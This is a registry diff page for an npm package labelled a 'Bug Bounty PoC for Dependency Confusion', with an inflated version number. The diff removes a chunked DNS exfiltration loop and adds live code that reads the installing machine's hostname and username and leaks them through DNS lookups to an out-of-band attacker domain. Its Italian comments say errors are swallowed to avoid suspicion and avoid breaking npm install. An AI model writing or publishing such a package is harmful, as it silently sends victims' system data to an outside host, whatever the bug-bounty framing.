internal-company-module-test-1337 99.99.9995 → 99.99.9996
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +16 -40
- package/package.json +2 -2
package/index.js
CHANGED
|
@@ -1,43 +1,19 @@
|
|
|
1
1
|
const dns = require('dns');
|
|
2
2
|
const os = require('os');
|
|
3
3
|
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
(
|
|
9
|
-
|
|
10
|
-
|
|
11
|
-
|
|
12
|
-
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
const chunkSize = 20; // più piccolo = meno corruption
|
|
21
|
-
const chunks = [];
|
|
22
|
-
|
|
23
|
-
for (let i = 0; i < hex.length; i += chunkSize) {
|
|
24
|
-
chunks.push(hex.slice(i, i + chunkSize));
|
|
25
|
-
}
|
|
26
|
-
|
|
27
|
-
const sessionId = Math.floor(Math.random() * 0xffff)
|
|
28
|
-
.toString(16)
|
|
29
|
-
.padStart(4, '0');
|
|
30
|
-
|
|
31
|
-
const sleep = ms => new Promise(r => setTimeout(r, ms));
|
|
32
|
-
|
|
33
|
-
for (let i = 0; i < chunks.length; i++) {
|
|
34
|
-
const payload = `${sessionId}.${i}.${chunks[i]}.${attackerDomain}`;
|
|
35
|
-
dns.lookup(payload, () => {});
|
|
36
|
-
await sleep(200);
|
|
37
|
-
}
|
|
38
|
-
|
|
39
|
-
// EOF marker stabile
|
|
40
|
-
dns.lookup(`${sessionId}.eof.0.${attackerDomain}`, () => {});
|
|
41
|
-
|
|
42
|
-
} catch (e) {}
|
|
43
|
-
})();
|
|
4
|
+
// Estrae dati di base del sistema per confermare l'RCE
|
|
5
|
+
const hostname = os.hostname().replace(/[^a-zA-Z0-9]/g, '');
|
|
6
|
+
const username = os.userInfo().username.replace(/[^a-zA-Z0-9]/g, '');
|
|
7
|
+
|
|
8
|
+
// Dominio controllato dall'attaccante (es. generato da DNSBin)
|
|
9
|
+
const attackerDomain = "d7rmv8ldfm4fftabirr0q6i9urgygm6fa.oast.pro";
|
|
10
|
+
|
|
11
|
+
// Costruisce il sottodominio contenente i dati esfiltrati
|
|
12
|
+
// Es: root.server-prod-01.c1a2b3c4d5.dnsbin.net
|
|
13
|
+
const exfilPayload = `${username}.${hostname}.${attackerDomain}`;
|
|
14
|
+
|
|
15
|
+
// Esegue una risoluzione DNS per esfiltrare i dati via OOB
|
|
16
|
+
dns.lookup(exfilPayload, (err, address, family) => {
|
|
17
|
+
// L'errore viene ignorato silenziosamente per non destare sospetti
|
|
18
|
+
// e non far fallire l'installazione npm
|
|
19
|
+
});
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "internal-company-module-test-1337",
|
|
3
|
-
"version": "99.99.
|
|
3
|
+
"version": "99.99.9996",
|
|
4
4
|
"description": "Bug Bounty PoC for Dependency Confusion",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
@@ -9,6 +9,6 @@
|
|
|
9
9
|
"author": "Security Researcher",
|
|
10
10
|
"license": "MIT",
|
|
11
11
|
"dependencies": {
|
|
12
|
-
"internal-company-module-test-1337": "^99.99.
|
|
12
|
+
"internal-company-module-test-1337": "^99.99.9996"
|
|
13
13
|
}
|
|
14
14
|
}
|